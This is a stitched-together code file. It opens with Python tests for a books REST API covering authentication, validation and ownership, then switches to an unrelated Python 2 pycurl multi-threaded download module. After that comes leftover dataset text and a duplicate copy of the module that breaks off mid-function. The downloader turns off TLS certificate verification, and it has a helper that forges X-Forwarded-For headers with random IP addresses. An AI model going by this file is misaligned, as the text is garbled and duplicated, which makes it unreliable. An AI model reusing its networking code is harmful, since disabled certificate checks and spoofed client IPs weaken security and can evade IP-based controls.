    """POST /books without credentials is a 400, even with full book data."""
    book_data = dict(
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.post('/books', book_data, status=400)
    assert response.status_code == 400
def test_book_list_post_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that POST to book-list route gets 403 status code for bad auth."""
    data = {
        'email': one_user.email,
        # Fix: '<PASSWORD>' is a redaction artifact; use a value that cannot
        # match the fixture password ('password') to exercise the 403 branch.
        'password': 'not-the-password',
        'title': FAKE.sentence(nb_words=3),
        'author': FAKE.name(),
        'isbn': FAKE.isbn13(separator="-"),
        'pub_date': FAKE.date(pattern='%m/%d/%Y')
    }
    res = testapp.post('/books', data, status=403)
    assert res.status_code == 403
def test_book_list_post_incomplete_data_gets_400_status_code(testapp, one_user):
    """POST /books without a title is rejected with 400."""
    payload = dict(
        email=one_user.email,
        password='password',
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.post('/books', payload, status=400)
    assert response.status_code == 400
def test_book_list_post_incorrect_date_gets_400_status_code(testapp, one_user):
    """A pub_date in the wrong format (ISO instead of m/d/Y) is a 400."""
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%Y-%m-%d'),
    )
    response = testapp.post('/books', payload, status=400)
    assert response.status_code == 400
def test_book_list_post_complete_data_gets_201_status_code(testapp, one_user):
    """A fully-specified, authenticated POST /books returns 201."""
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.post('/books', payload)
    assert response.status_code == 201
def test_book_list_post_complete_data_adds_book_to_database(testapp, testapp_session, one_user):
    """A valid POST /books inserts exactly one new Book row."""
    count_before = len(testapp_session.query(Book).all())
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    testapp.post('/books', payload)
    assert len(testapp_session.query(Book).all()) == count_before + 1
def test_book_list_post_sets_email_user_as_book_owner(testapp, testapp_session, one_user):
    """The authenticated user becomes the owner of the created book."""
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.post('/books', payload)
    created = testapp_session.query(Book).get(response.json['id'])
    assert created.user.email == one_user.email
def test_book_list_post_complete_data_returns_json_with_new_book_info(testapp, one_user):
    """The JSON response echoes the fields of the newly created book."""
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.post('/books', payload)
    for field in ('title', 'author', 'isbn', 'pub_date'):
        assert response.json[field] == payload[field]
    assert response.json['id'] is not None
def test_book_list_post_data_without_values_sets_values_to_none(testapp, one_user):
    """Omitted book fields come back as None in the response JSON."""
    payload = dict(
        email=one_user.email,
        password='password',
        title=FAKE.sentence(nb_words=3),
    )
    response = testapp.post('/books', payload)
    for field in ('author', 'isbn', 'pub_date'):
        assert response.json[field] is None
def test_book_list_get_correct_auth_all_books_for_user(testapp, testapp_session, one_user):
    """GET /books returns one entry per book the user owns."""
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get('/books', credentials)
    owned_books = testapp_session.query(User).get(one_user.id).books
    assert len(response.json) == len(owned_books)
def test_book_list_get_correct_auth_all_book_details(testapp, one_user):
    """Every listed book carries the full set of detail fields."""
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get('/books', credentials)
    expected_fields = ('id', 'title', 'author', 'isbn', 'pub_date')
    for book in response.json:
        assert all(field in book for field in expected_fields)
def test_book_id_other_methods_gets_404_status_code(testapp):
    """Unsupported HTTP verbs on /books/<id> must respond 404."""
    for verb in ('post',):
        response = getattr(testapp, verb)('/books/1', status=404)
        assert response.status_code == 404
def test_book_id_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """GET /books/<id> without credentials is rejected with 400."""
    response = testapp.get('/books/1', status=400)
    assert response.status_code == 400
def test_book_id_get_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that GET to book-id route gets 403 status code for bad auth."""
    data = {
        'email': one_user.email,
        # Fix: '<PASSWORD>' redaction artifact replaced by a definitely-wrong
        # password (the fixture's real one is 'password').
        'password': 'not-the-password',
    }
    res = testapp.get('/books/1', data, status=403)
    assert res.status_code == 403
def test_book_id_get_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Requesting somebody else's book looks like a missing resource (404)."""
    other_book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get(f'/books/{other_book.id}', credentials, status=404)
    assert response.status_code == 404
def test_book_id_get_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
    """GET for one of the user's own books succeeds with 200."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get(f'/books/{own_book.id}', credentials)
    assert response.status_code == 200
def test_book_id_get_correct_auth_returns_json_with_book_info(testapp, testapp_session, one_user):
    """The JSON body mirrors the stored book, with pub_date formatted m/d/Y."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = dict(email=one_user.email, password='password')
    response = testapp.get(f'/books/{own_book.id}', credentials)
    for field in ('id', 'title', 'author', 'isbn'):
        assert response.json[field] == getattr(own_book, field)
    assert response.json['pub_date'] == own_book.pub_date.strftime('%m/%d/%Y')
def test_book_id_put_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """PUT /books/<id> without credentials is rejected with 400."""
    response = testapp.put('/books/1', status=400)
    assert response.status_code == 400
def test_book_id_put_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that PUT to book-id route gets 403 status code for bad auth."""
    data = {
        'email': one_user.email,
        # Fix: '<PASSWORD>' redaction artifact replaced by a definitely-wrong
        # password (the fixture's real one is 'password').
        'password': 'not-the-password',
    }
    res = testapp.put('/books/1', data, status=403)
    assert res.status_code == 403
def test_book_id_put_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Updating somebody else's book looks like a missing resource (404)."""
    other_book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = dict(email=one_user.email, password='password')
    response = testapp.put(f'/books/{other_book.id}', credentials, status=404)
    assert response.status_code == 404
def test_book_id_put_correct_auth_incorrect_date_gets_400_status_code(testapp, testapp_session, one_user):
    """A pub_date in the wrong format on update is rejected with 400."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    payload = dict(
        email=one_user.email,
        password='password',
        pub_date=FAKE.date(pattern='%Y-%m-%d'),
    )
    response = testapp.put(f'/books/{own_book.id}', payload, status=400)
    assert response.status_code == 400
def test_book_id_put_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
    """A valid partial update of an owned book succeeds with 200."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    payload = dict(email=one_user.email, password='password', author=FAKE.name())
    response = testapp.put(f'/books/{own_book.id}', payload)
    assert response.status_code == 200
def test_book_id_put_correct_auth_does_not_add_book_to_database(testapp, testapp_session, one_user):
    """Updating a book must not change the number of Book rows."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    count_before = len(testapp_session.query(Book).all())
    payload = dict(
        email=one_user.email,
        password='password',
        isbn=FAKE.isbn13(separator="-"),
    )
    testapp.put(f'/books/{own_book.id}', payload)
    assert len(testapp_session.query(Book).all()) == count_before
def test_book_id_put_correct_auth_updates_book_in_database(testapp, testapp_session, one_user):
    """The updated field is visible on a subsequent GET."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    payload = dict(email=one_user.email, password='password', author=FAKE.name())
    testapp.put(f'/books/{own_book.id}', payload)
    refreshed = testapp.get(f'/books/{own_book.id}', payload)
    assert refreshed.json['author'] == payload['author']
def test_book_id_put_correct_auth_returns_json_with_updated_book_info(testapp, testapp_session, one_user):
    """The JSON response merges the update over the stored book's values."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    payload = dict(
        email=one_user.email,
        password='password',
        author=FAKE.name(),
        isbn=FAKE.isbn13(separator="-"),
        pub_date=FAKE.date(pattern='%m/%d/%Y'),
    )
    response = testapp.put(f'/books/{own_book.id}', payload)
    for field in ('id', 'title', 'author', 'isbn', 'pub_date'):
        if field in payload:
            assert response.json[field] == payload[field]
        else:
            assert response.json[field] == getattr(own_book, field)
def test_book_id_delete_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
    """DELETE /books/<id> without credentials is rejected with 400."""
    response = testapp.delete('/books/1', status=400)
    assert response.status_code == 400
def test_book_id_delete_incorrect_auth_gets_403_status_code(testapp, one_user):
    """Test that DELETE to book-id route gets 403 status code for bad auth."""
    data = {
        'email': one_user.email,
        # Fix: '<PASSWORD>' redaction artifact replaced by a definitely-wrong
        # password (the fixture's real one is 'password').
        'password': 'not-the-password'
    }
    res = testapp.delete('/books/1', data, status=403)
    assert res.status_code == 403
def test_book_id_delete_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
    """Deleting somebody else's book looks like a missing resource (404)."""
    other_book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
    credentials = dict(email=one_user.email, password='password')
    response = testapp.delete(f'/books/{other_book.id}', credentials, status=404)
    assert response.status_code == 404
def test_book_id_delete_correct_auth_has_204_response_code(testapp, testapp_session, one_user):
    """Deleting one of the user's own books returns 204 No Content."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    credentials = dict(email=one_user.email, password='password')
    response = testapp.delete(f'/books/{own_book.id}', credentials)
    assert response.status_code == 204
def test_book_id_delete_correct_auth_removes_book_from_database(testapp, testapp_session, one_user):
    """Deleting a book shrinks the Book table by exactly one row."""
    own_book = testapp_session.query(User).get(one_user.id).books[0]
    count_before = len(testapp_session.query(Book).all())
    credentials = dict(email=one_user.email, password='password')
    testapp.delete(f'/books/{own_book.id}', credentials)
    assert len(testapp_session.query(Book).all()) == count_before - 1
def test_book_id_delete_correct_auth_removes_book_by_id(testapp, testapp_session, one_user):
    """Test that DELETE to book-id route removes the correct Book by id."""
    book = testapp_session.query(User).get(one_user.id).books[0]
    book_id = book.id
    data = {
        'email': one_user.email,
        'password': 'password'
    }
    res = testapp.get(f'/books/{book_id}', data)
    assert res.status_code == 200
    testapp.delete(f'/books/{book_id}', data)
    res = testapp.get(f'/books/{book_id}', data, status=404)
    # Fix: the final line carried dataset-dump residue ("| 0.709321 | ...")
    # after the assert, which made the file a syntax error; it is removed.
    assert res.status_code == 404
import pycurl
import os
import sys
import StringIO
import urllib2
import lib_TheardPool2
import lib_func
import shutil
import gzip
import urlparse
import re
import math
# Module-level lock shared across threads.
# NOTE(review): bmdownload instances create their own lock in __init__; this
# global one is only referenced by the commented-out downdata4info at the
# bottom of the module.
flock=lib_TheardPool2.getlock()
# Default curl options applied to every handle: a browser-like User-Agent
# plus standard Accept / Accept-Encoding / keep-alive headers.
curlopts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
    pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
    "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
    "Accept-Encoding: gzip, deflate",\
    "Connection: keep-alive"]
    }
class bmdownload:
    """blackmoon download class.

    Multi-threaded HTTP downloader built on pycurl: the target file is split
    into fixed-size blocks and each block is fetched with a ranged request by
    a worker thread from lib_TheardPool2.  (Python 2 code: StringIO,
    dict.iteritems/has_key.)
    """
    def __init__(self,log=1):
        # log: when truthy, the aggregate speed is printed on every poll.
        self.log=log
        # Per-instance lock serialising seek+write pairs on the output file.
        self.flock=lib_TheardPool2.getlock()
    def download(self,address,savepath,savename="",opts={},thread=1):
        """Download *address* into savepath/savename using *thread* workers.

        NOTE(review): ``opts={}`` is a mutable default argument; it is only
        read here and copied via lib_func.copydict, so it is not mutated.
        """
        if not address:
            lib_func.printstr("You should input vaild urls",2)
            return
        objc=self.initobjc(opts)
        try:
            # finfo is (effective_url, size_in_bytes, suggested_filename).
            finfo=self.getfileinfo(objc,address)
        except Exception as e:
            lib_func.printstr(str(e),"DD:Get ddinfo faile:")
            return
        opts=lib_func.copydict(opts,(pycurl.URL,finfo[0]))
        if finfo[1]==0:
            # Size could not be determined (no Content-Range in the reply).
            lib_func.printstr("Have error in download",2)
            return
        block=self.getblock(finfo[1])
        fname=savepath+'/'+savename
        # 'status' has one zero-initialised slot per block.
        dlinfo={'url':finfo[0],'save':fname,'size':finfo[1],'block':block,'status':[0 for i in range(int(math.ceil(float(finfo[1])/block)))]}
        self.printdd(dlinfo)
        # NOTE(review): getfp() returns None when a .bmcache file exists,
        # which would make f.close() below raise — resume support looks
        # unfinished; confirm before relying on it.
        f=self.getfp(dlinfo['save'],dlinfo['size'])
        pool=lib_TheardPool2.threadpool(thread,start=False)
        # Give every worker its own curl handle (handles are not shareable).
        pool.initsubthead(self.initsub,(opts,))
        [pool.addtask(self.getbytes,(dlinfo,i,f))for i in range(len(dlinfo['status']))]
        pool.start()
        pool.waitPoolComplete(self.getspeed)
        f.close()
    def getspeed(self,pool):
        """Progress callback: sum per-thread speeds and log them when enabled."""
        speed=0
        for thread in pool.threads:
            speed+=thread.threadvars['speed']
        if self.log:
            lib_func.printstr("%.2f kb/s" %(speed/1024),"DD:Speed:")
        else:
            pass
    def getfp(self,savepath,size):
        """Create the output file, pre-extended to *size* bytes, and return it.

        NOTE(review): when ``savepath + '.bmcache'`` exists this returns None
        (the file is never opened) and no caller handles that case.
        """
        if os.path.isfile(savepath+'.bmcache'):
            f=None
            pass
        else:
            f=open(savepath,'wb')
            # Write a marker at the end so workers can seek+write anywhere.
            f.seek(size-3)
            f.write('EOF')
            f.flush()
        return f
    def printdd(self,dlinfo):
        """Log the URL, destination path and size of the pending download."""
        lib_func.printstr(dlinfo['url'],"DD:URL:")
        lib_func.printstr(dlinfo['save'],"DD:SAVE:")
        lib_func.printstr(dlinfo['size'],"DD:SIZE:")
    def initobjc(self,opts):
        """Build a curl handle with the module defaults plus caller *opts*."""
        objc=pycurl.Curl()
        for key,value in curlopts.iteritems():
            objc.setopt(key,value)
        for key,value in opts.iteritems():
            objc.setopt(key,value)
        # Certificate verification is disabled for https downloads.
        objc.setopt(pycurl.SSL_VERIFYPEER, 0)
        objc.setopt(pycurl.SSL_VERIFYHOST, 0)
        return objc
    def initsub(self,opts,pool):
        """Attach a private curl handle and speed counter to every worker."""
        for thread in pool.threads:
            thread.threadvars['objc']=self.initobjc(opts)
            thread.threadvars['speed']=0
    def write2file(self,objs,dlinfo,index,fp):
        """Write one downloaded block at its byte offset, under the lock."""
        self.flock.acquire()
        fp.seek(index*dlinfo['block'])
        fp.write(objs.getvalue())
        self.flock.release()
    def getbytes(self,dlinfo,index,fp,threadvar):
        """Worker task: fetch block *index* via a Range request, 3 retries."""
        objc=threadvar['objc']
        objs=StringIO.StringIO()
        objc.setopt(pycurl.WRITEFUNCTION, objs.write)
        objc.setopt(pycurl.RANGE,"%d-%d" %(index*dlinfo['block'],(index+1)*dlinfo['block']-1))
        for i in range(3):
            try:
                objc.perform()
                threadvar['speed']=objc.getinfo(pycurl.SPEED_DOWNLOAD)
                self.write2file(objs,dlinfo,index,fp)
                return
            except Exception as e:
                lib_func.printstr(str(e),"DD:Exception:")
        lib_func.printstr("Time out ,can't download",2)
    def getblock(self,size):
        """Pick a block size appropriate for *size* (1KB up to 500KB)."""
        if size<=10*1024:
            block=1024 #1KB
        elif size<=100*1024:
            block=1024*10 #10KB
        elif size<=1024*1024:
            block=1024*100 #100KB
        else:
            block=1024*500 #500KB
        '''
        elif size<=1024*1024*10:
            block=1024*1024 #1M
        else:
            block=1024*1024*1 #2M
        '''
        return block
    def getfileinfo(self,objc,url,follow=3):
        """Resolve redirects and return (effective_url, size, filename).

        Sends a one-byte ranged request: the total size comes from the
        Content-Range header and the name from Content-Disposition when
        present (otherwise 0 / "").
        """
        head=list()
        head.extend(curlopts[pycurl.HTTPHEADER])
        head.append('Range: bytes=0-0')  # one byte: headers only
        objc.setopt(pycurl.HTTPHEADER,head)
        eurl=geteffectiveurl(objc,url,5)
        size=0
        name=""
        head,body=get4url(eurl,{},objc)
        parseh=parsehttphead(head)
        if parseh.has_key('content-range'):
            # "Content-Range: bytes 0-0/12345" -> total size after the '/'.
            size=int(parseh['content-range'].split('/')[1])
        if parseh.has_key('content-disposition'):
            m=re.search(r'filename=\"(.*?)\"',parseh['content-disposition'])
            if m:
                name=m.groups()[0]
        return eurl,size,name
def getdata4info(url,opts={},objc=None,objs=None,objh=None,timeout=5):
    """Perform a curl request and return (raw_header_text, raw_body_text).

    Creates a throwaway curl handle and StringIO buffers when none are
    supplied.  NOTE(review): ``opts={}`` is a mutable default argument; it is
    only iterated here, but a None default would be safer.
    """
    if not objc:
        objc=pycurl.Curl()
        objc.setopt(objc.SSL_VERIFYPEER, 0) # https: certificate checks disabled
        objc.setopt(objc.SSL_VERIFYHOST, 0)
    if not objs:
        objs=StringIO.StringIO()
    if not objh:
        objh=StringIO.StringIO()
    objc.setopt(pycurl.URL,url.strip())
    objc.setopt(pycurl.TIMEOUT,timeout)
    objc.setopt(pycurl.WRITEFUNCTION, objs.write)
    objc.setopt(pycurl.HEADERFUNCTION,objh.write)
    for key,value in opts.iteritems():
        objc.setopt(key,value)
    objc.perform()
    return objh.getvalue(),objs.getvalue()
def get4url(url,curlopts={},objc=None,timeout=5):
    """Fetch *url* via getdata4info and return (headers, body).

    NOTE(review): implicitly returns None when *url* is falsy; callers that
    unpack the result will raise on an empty URL.
    """
    if url:
        return getdata4info(url,curlopts,objc,timeout=timeout)
def parsehttphead(head):
    """Parse a raw HTTP response header block into a dict.

    The status line is stored under 'version', 'code' and 'status'; every
    other "Key: Value" line is stored under its lower-cased key.
    """
    parsed = {}
    for raw_line in head.split('\r\n'):
        line = raw_line.strip()
        if line[:4] == "HTTP":
            pieces = line.split(' ')
            parsed['version'] = pieces[0]
            parsed['code'] = pieces[1]
            # A reason phrase is only recorded for a three-token status line.
            parsed['status'] = pieces[2] if len(pieces) == 3 else ''
        elif line:
            key, value = line.split(':', 1)
            parsed[key.lower()] = value.strip()
    return parsed
def gethttpresponse(hhead,hbody):
    """Return the response body, gunzipped when the headers say it is gzip.

    ``hhead`` is a parsed header dict (see parsehttphead); ``hbody`` the raw
    body text.
    """
    # Fix: dict.has_key() was removed in Python 3; the ``in`` operator is the
    # exact equivalent and behaves identically in Python 2.
    if 'content-encoding' in hhead and hhead['content-encoding'].find('gzip')>=0:
        return gzip.GzipFile(fileobj=StringIO.StringIO(hbody)).read()
    else:
        return hbody
def getpyurl(copt={},proxy=None,ffx=None):
    """Return a configured pycurl handle with browser-like defaults.

    copt: extra curl options applied last; proxy: optional proxy URL;
    ffx: when set (e.g. 'sgcc'), adds an X-Forwarded-For header carrying a
    random IP from getrandomip(ffx).
    NOTE(review): ``copt={}`` is a mutable default argument (read-only here),
    and ``if obj:`` below is always true since pycurl.Curl() was just created.
    """
    obj=pycurl.Curl()
    obj.setopt(pycurl.SSL_VERIFYPEER, 0) # https: certificate checks disabled
    obj.setopt(pycurl.SSL_VERIFYHOST, 0)
    if ffx:
        ffxip=getrandomip(ffx)
    opts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
        pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
        "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
        "Accept-Encoding: gzip, deflate",\
        "Connection: keep-alive"]
        }
    if ffx:
        opts[pycurl.HTTPHEADER].append("X-Forwarded-For: %s" %ffxip)
    for key,value in opts.iteritems():
        obj.setopt(key,value)
    if obj:
        for key,value in copt.iteritems():
            obj.setopt(key,value)
    if proxy:
        obj.setopt(pycurl.PROXY,proxy)
    return obj
def getrandomip(flag='net'):
    """Build a random dotted-quad IP; flag 'sgcc' pins the first octet to 10."""
    import random
    first = 10 if flag == 'sgcc' else random.randint(1, 254)
    rest = [random.randint(1, 254) for _ in range(3)]
    return ".".join(str(octet) for octet in [first] + rest)
def getlinks4soup(soup,filter='link|.*',host=None):
    """Collect link URLs from a BeautifulSoup-style document.

    ``filter`` is "link|<regex>" (match the regex against the whole URL) or
    "type|<regex>" (match against the file extension).  ``host`` is prepended
    to relative links.
    """
    import re
    lks=[]
    tags={'a':'href','img':'src','link':'src','javascript':'src'}
    mode,pattern=filter.split('|')
    # .items() works in both Python 2 and 3 (iteritems is py2-only).
    for key,value in tags.items():
        links=soup.findAll(key)
        for link in links:
            lk=link[value].strip()
            # Fix: the original prepended *host* to URLs that were already
            # absolute ("http..."); a relative URL is the one that needs it.
            if host and lk[:4]!='http':
                lk=host+lk
            if mode=='link' and re.search(pattern,lk):
                lks.append(lk)
            elif mode=='type':
                inx=lk.rfind('.')
                # Fix: the original called re.search(filter, ...) with the
                # split *list* instead of the pattern, and treated rfind()'s
                # -1 ("no dot") as a hit.
                if inx!=-1 and re.search(pattern,lk[inx+1:]):
                    lks.append(lk)
    return lks
def getdomain4url(urls):
    """Return the "scheme://netloc" prefix of *urls*."""
    parts = urlparse.urlsplit(urls)
    return "{0}://{1}".format(parts.scheme, parts.netloc)
def u28quote(string):
    """Percent-encode a unicode string as UTF-8 (urllib2.quote wrapper)."""
    return urllib2.quote(string.encode('utf8'))
def geteffectiveurl(objc,url,nums=3):
    """Follow up to *nums* redirects by hand and return the final URL.

    Returns None when the chain is still redirecting after *nums* hops.
    """
    # Redirects are followed manually so each Location header can be read.
    objc.setopt(pycurl.FOLLOWLOCATION,0)
    for i in range(nums):
        head,body=get4url(url,{},objc)
        hdict=parsehttphead(head)
        if hdict.has_key('location'):
            url=hdict['location']
            continue
        return url.strip()
    return None
"""
def downdata4info(downinfo,fhand,num,threadvars):
objc=threadvars['objc']
#objs=threadvars['objs']
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
objc.setopt(pycurl.URL,downinfo['location'])
objs=StringIO.StringIO()
#objc.setopt(objc.VERBOSE, 1)
#objc.setopt(objc.DEBUGFUNCTION, test)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
#objc.setopt(pycurl.HEADERFUNCTION,objh.write)
#objc.setopt(pycurl.FOLLOWLOCATION, 1)
#objc.setopt(pycurl.HTTPHEADER,['Range: 0-1024'])
#objc.setopt(pycurl.HEADER,True) #get head and body from stringio
#objc.setopt(pycurl.WRITEHEADER,h)
objc.setopt(pycurl.RANGE,"%d-%d" %(num*downinfo['block'],(num+1)*downinfo['block']-1))
#objc.setopt(pycurl.USERAGENT,"netdisk;5.3.4.5;PC;PC-Windows;6.2.9200;WindowsBaiduYunGuanJia")
#objc.setopt(pycurl.PROXY,"http://127.0.0.1:8088")
objc.perform()
flock.acquire()
fhand.seek(num*downinfo['block'])
fhand.write(objs.getvalue())
downinfo['status'][num]=1
flock.release()
objs.close()
threadvars['speed']=objc.getinfo(objc.SPEED_DOWNLOAD)/1024
print "HTTP-code:", objc.getinfo(objc.HTTP_CODE)
print "Total-time:", objc.getinfo(objc.TOTAL_TIME)
print "Download speed: %.2f bytes/second" % objc.getinfo(objc.SPEED_DOWNLOAD)
print "Document size: %d bytes" % objc.getinfo(objc.SIZE_DOWNLOAD)
print "Effective URL:", objc.getinfo(objc.EFFECTIVE_URL)
print "Content-type:", objc.getinfo(objc.CONTENT_TYPE)
print "Namelookup-time:", objc.getinfo(objc.NAMELOOKUP_TIME)
print "Redirect-time:", objc.getinfo(objc.REDIRECT_TIME)
print "Redirect-count:", objc.getinfo(objc.REDIRECT_COUNT)
print "====================="
""" | lib_http.py | import pycurl
import StringIO
import gzip
import math
import os
import re
import shutil
import sys
import urllib2
import urlparse

import pycurl

import lib_TheardPool2
import lib_func
# NOTE(review): from here to the end of this copy, the chunk repeats the same
# lib_http module a second time (dataset 'parsed_code' column duplicate).
# Module-level lock shared across threads; instances also make their own.
flock=lib_TheardPool2.getlock()
# Default curl options: browser-like User-Agent plus standard headers.
curlopts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
    pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
    "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
    "Accept-Encoding: gzip, deflate",\
    "Connection: keep-alive"]
    }
class bmdownload:
    """blackmoon download class.

    NOTE(review): duplicate copy of the bmdownload class that appears earlier
    in this chunk.  Multi-threaded pycurl downloader: the file is split into
    fixed-size blocks fetched with ranged requests by worker threads.
    """
    def __init__(self,log=1):
        # log: when truthy, aggregate speed is printed on every poll.
        self.log=log
        # Per-instance lock serialising seek+write pairs on the output file.
        self.flock=lib_TheardPool2.getlock()
    def download(self,address,savepath,savename="",opts={},thread=1):
        """Download *address* into savepath/savename using *thread* workers."""
        if not address:
            lib_func.printstr("You should input vaild urls",2)
            return
        objc=self.initobjc(opts)
        try:
            # finfo is (effective_url, size_in_bytes, suggested_filename).
            finfo=self.getfileinfo(objc,address)
        except Exception as e:
            lib_func.printstr(str(e),"DD:Get ddinfo faile:")
            return
        opts=lib_func.copydict(opts,(pycurl.URL,finfo[0]))
        if finfo[1]==0:
            lib_func.printstr("Have error in download",2)
            return
        block=self.getblock(finfo[1])
        fname=savepath+'/'+savename
        # 'status' has one zero-initialised slot per block.
        dlinfo={'url':finfo[0],'save':fname,'size':finfo[1],'block':block,'status':[0 for i in range(int(math.ceil(float(finfo[1])/block)))]}
        self.printdd(dlinfo)
        # NOTE(review): getfp() may return None when a .bmcache file exists.
        f=self.getfp(dlinfo['save'],dlinfo['size'])
        pool=lib_TheardPool2.threadpool(thread,start=False)
        pool.initsubthead(self.initsub,(opts,))
        [pool.addtask(self.getbytes,(dlinfo,i,f))for i in range(len(dlinfo['status']))]
        pool.start()
        pool.waitPoolComplete(self.getspeed)
        f.close()
    def getspeed(self,pool):
        """Progress callback: sum per-thread speeds and log when enabled."""
        speed=0
        for thread in pool.threads:
            speed+=thread.threadvars['speed']
        if self.log:
            lib_func.printstr("%.2f kb/s" %(speed/1024),"DD:Speed:")
        else:
            pass
    def getfp(self,savepath,size):
        """Create the output file pre-extended to *size* bytes; may return None."""
        if os.path.isfile(savepath+'.bmcache'):
            f=None
            pass
        else:
            f=open(savepath,'wb')
            f.seek(size-3)
            f.write('EOF')
            f.flush()
        return f
    def printdd(self,dlinfo):
        """Log URL, destination path and size of the pending download."""
        lib_func.printstr(dlinfo['url'],"DD:URL:")
        lib_func.printstr(dlinfo['save'],"DD:SAVE:")
        lib_func.printstr(dlinfo['size'],"DD:SIZE:")
    def initobjc(self,opts):
        """Build a curl handle with module defaults plus caller *opts*."""
        objc=pycurl.Curl()
        for key,value in curlopts.iteritems():
            objc.setopt(key,value)
        for key,value in opts.iteritems():
            objc.setopt(key,value)
        objc.setopt(pycurl.SSL_VERIFYPEER, 0)
        objc.setopt(pycurl.SSL_VERIFYHOST, 0)
        return objc
    def initsub(self,opts,pool):
        """Attach a private curl handle and speed counter to every worker."""
        for thread in pool.threads:
            thread.threadvars['objc']=self.initobjc(opts)
            thread.threadvars['speed']=0
    def write2file(self,objs,dlinfo,index,fp):
        """Write one downloaded block at its byte offset, under the lock."""
        self.flock.acquire()
        fp.seek(index*dlinfo['block'])
        fp.write(objs.getvalue())
        self.flock.release()
    def getbytes(self,dlinfo,index,fp,threadvar):
        """Worker task: fetch block *index* via a Range request, 3 retries."""
        objc=threadvar['objc']
        objs=StringIO.StringIO()
        objc.setopt(pycurl.WRITEFUNCTION, objs.write)
        objc.setopt(pycurl.RANGE,"%d-%d" %(index*dlinfo['block'],(index+1)*dlinfo['block']-1))
        for i in range(3):
            try:
                objc.perform()
                threadvar['speed']=objc.getinfo(pycurl.SPEED_DOWNLOAD)
                self.write2file(objs,dlinfo,index,fp)
                return
            except Exception as e:
                lib_func.printstr(str(e),"DD:Exception:")
        lib_func.printstr("Time out ,can't download",2)
    def getblock(self,size):
        """Pick a block size appropriate for *size* (1KB up to 500KB)."""
        if size<=10*1024:
            block=1024 #1KB
        elif size<=100*1024:
            block=1024*10 #10KB
        elif size<=1024*1024:
            block=1024*100 #100KB
        else:
            block=1024*500 #500KB
        '''
        elif size<=1024*1024*10:
            block=1024*1024 #1M
        else:
            block=1024*1024*1 #2M
        '''
        return block
    def getfileinfo(self,objc,url,follow=3):
        """Resolve redirects and return (effective_url, size, filename)."""
        head=list()
        head.extend(curlopts[pycurl.HTTPHEADER])
        head.append('Range: bytes=0-0')  # one byte: headers only
        objc.setopt(pycurl.HTTPHEADER,head)
        eurl=geteffectiveurl(objc,url,5)
        size=0
        name=""
        head,body=get4url(eurl,{},objc)
        parseh=parsehttphead(head)
        if parseh.has_key('content-range'):
            size=int(parseh['content-range'].split('/')[1])
        if parseh.has_key('content-disposition'):
